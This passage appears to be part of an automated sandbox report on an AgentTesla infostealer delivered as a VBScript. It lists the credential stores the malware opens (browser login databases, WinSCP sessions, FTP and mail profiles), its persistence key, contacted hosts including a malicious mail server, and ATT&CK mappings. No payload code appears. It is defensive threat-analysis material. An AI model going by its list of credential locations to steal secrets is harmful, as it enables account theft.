            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_00623675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00623675
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts231
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		1
            File and Directory Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            Software Packing            		Security Account Manager35
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            Timestomp            		NTDS1
            Query Registry            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets641
            Security Software Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials1
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items361
            Virtualization/Sandbox Evasion            		DCSync361
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Rundll32            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430859 Sample: Umulighed.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 38 mail.cash4cars.nz 2->38 40 ip-api.com 2->40 42 2 other IPs or domains 2->42 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 7 other signatures 2->58 9 wscript.exe 1 2->9         started        12 newfile.exe 1 2->12         started        14 newfile.exe 3 1 2->14         started        16 rundll32.exe 2->16         started        signatures3 process4 signatures5 72 VBScript performs obfuscated calls to suspicious functions 9->72 74 Suspicious powershell command line found 9->74 76 Wscript starts Powershell (via cmd or directly) 9->76 78 3 other signatures 9->78 18 powershell.exe 14 19 9->18         started        process6 dnsIp7 44 drive.google.com 142.251.2.101, 443, 49730, 49737 GOOGLEUS United States 18->44 46 drive.usercontent.google.com 142.251.2.132, 443, 49731, 49738 GOOGLEUS United States 18->46 60 Suspicious powershell command line found 18->60 62 Very long command line found 18->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 18->64 22 powershell.exe 17 18->22         started        25 conhost.exe 18->25         started        27 cmd.exe 1 18->27         started        signatures8 process9 signatures10 66 Writes to foreign memory regions 22->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 22->68 70 Hides threads from debuggers 22->70 29 wab.exe 16 10 22->29         started        34 cmd.exe 1 22->34         started        process11 dnsIp12 48 mail.cash4cars.nz 114.142.162.17, 26, 49740 SERVERMULE-AS-APNimbus2PtyLtdAU Australia 29->48 50 ip-api.com 208.95.112.1, 49739, 80 TUT-ASUS United States 29->50 36 C:\Users\user\AppData\Roaming\...\newfile.exe, PE32 29->36 dropped 80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->80 82 Tries to steal Mail credentials (via file / registry access) 29->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->84 86 4 other signatures 29->86 file13 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Umulighed.vbs5%ReversingLabsWin32.Dropper.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\newfile\newfile.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://r3.o.lencr.org00%URL Reputationsafe
            http://mail.cash4cars.nz0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0R0%Avira URL Cloudsafe
            https://drive.usercontent.googh0%Avira URL Cloudsafe
            https://drive.googP0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.cash4cars.nz
            		114.142.162.17
            		truetrue
              		unknown
              drive.google.com
              		142.251.2.101
              		truefalse
                		high
                drive.usercontent.google.com
                		142.251.2.132
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://ip-api.com/line/?fields=hostingfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://r3.i.lencr.org/0Rwab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://mail.cash4cars.nzwab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://drive.usercontent.google.compowershell.exe, 00000001.00000002.2122412787.00000221D3E51000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000001.00000002.2122412787.00000221D448E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://drive.googPpowershell.exe, 00000001.00000002.2122412787.00000221D5AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.usercontent.googhpowershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.usercontent.google.com/wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://drive.google.compowershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.compowershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.google.com/wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://x1.c.lencr.org/0wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://x1.i.lencr.org/0wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://ip-api.comwab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://r3.o.lencr.org0wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://drive.google.compowershell.exe, 00000001.00000002.2122412787.00000221D5A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.usercontent.google.compowershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://apis.google.compowershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/iwab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6lBtqpowershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        208.95.112.1
                                                        		ip-api.comUnited States
                                                        		53334TUT-ASUSfalse
                                                        114.142.162.17
                                                        		mail.cash4cars.nzAustralia
                                                        		133525SERVERMULE-AS-APNimbus2PtyLtdAUtrue
                                                        142.251.2.132
                                                        		drive.usercontent.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        142.251.2.101
                                                        		drive.google.comUnited States
                                                        		15169GOOGLEUSfalse

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1430859
                                                        Start date and time:2024-04-24 10:11:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 23s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:14
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Umulighed.vbs
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winVBS@15/8@4/4
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 64
                                                        • Number of non-executed functions: 31
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .vbs

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 6208 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 6912 because it is empty
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: Umulighed.vbs

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        09:12:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                        09:12:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                        10:11:57API Interceptor5064x Sleep call for process: powershell.exe modified
                                                        10:12:32API Interceptor113x Sleep call for process: wab.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        208.95.112.1Dhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        r)_78768.exeGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • ip-api.com/line/?fields=hosting
